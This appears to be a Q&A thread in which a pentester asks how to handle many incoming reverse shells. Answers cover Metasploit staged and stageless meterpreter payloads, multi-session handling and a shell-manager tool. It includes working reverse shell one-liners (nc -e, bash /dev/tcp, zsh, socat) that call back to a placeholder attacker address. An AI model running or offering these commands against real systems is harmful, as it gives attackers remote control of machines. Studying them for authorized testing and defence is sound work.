I'm running a pentest and im expecting reverse shells from multiple shells connecting back as :-
nc <my-ip> <my-port> -e /bin/bash
However, I'm trying to figure out the best way to manage these incoming connections. Are there any suggestions on best practices related to this? I had a look at metasploits meterpreter shell -- however it seems to be sending a payload back to the client. I dont require this, I merely require the connections to be handled properly.
Metasploit has multiple payloads divided into single, stager, and stage. Single payload is all encapsulated in one executable and don't require any additional downloads. For example, payload/windows/shell_reverse_tcp is a single payload which can be used as a standalone executable.
By default the meterpreter payload is a staged payload. If you generate it through msfconsole/msfpayload/msfvenom then the first stage is generated and when executed, it downloads the second stage metsrv.dll from the handler. However, there is a standalone meterpreter payload outside the Metasploit official tree created by Sherif Eldeeb. You can download it from Sherif Eldeep github repository.
From the github repositoty, download the ultimet.zip archive and generate the standalone executable as:
ultimet.exe -h <LHOST> -p <LPORT> -t "reverse_tcp" --msfpayload
-t is the transport you choose. You can other transports such as reverse/bind http(s) as well. The above command is going to create a new executable in the directory having a name REVERSE_TCP__LPORT.exe. This is a standalone meterpreter executable where the second stage metsrv.dll is encapsulated in the same executable. However, note that the reverse_https transport currently has a bug where the connection crashes every time you connect to the handler. reverse_tcp is very reliable.
Use the ExitOnSession false option in the msfconsole and you can handle as many sessions as you want. Also, I have noticed that multiple connections can be handled more efficiently through the Armitage more easily but it is only a matter of preference. msfconsole is also very good in handling multiple connections where you can automate a lot of post exploitation tasks using resource scripts.
Update: As of pull request 4925, stageless meterpreter is now part of official Metasploit distribution. This is not integration of Sharif's work but rather a complete rewrite from OJ Reeves.
You may need this tool that I created:
https://github.com/WangYihang/Reverse-Shell-Manager
This is a multiple reverse shell sessions/clients manager via terminal.
Attacker side: python Reverse-Shell-Manager.py 0.0.0.0 4444
Victim's sides
Linux:
nc -e /bin/bash 1.3.3.7 4444
bash -c 'bash -i >/dev/tcp/1.3.3.7/4444 0>&1'
zsh -c 'zmodload zsh/net/tcp && ztcp 1.3.3.7 4444 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:1.3.3.7:4444
Windows:
nc.exe -e /bin/bash 1.3.3.7 4444
Here are two videos can help you:
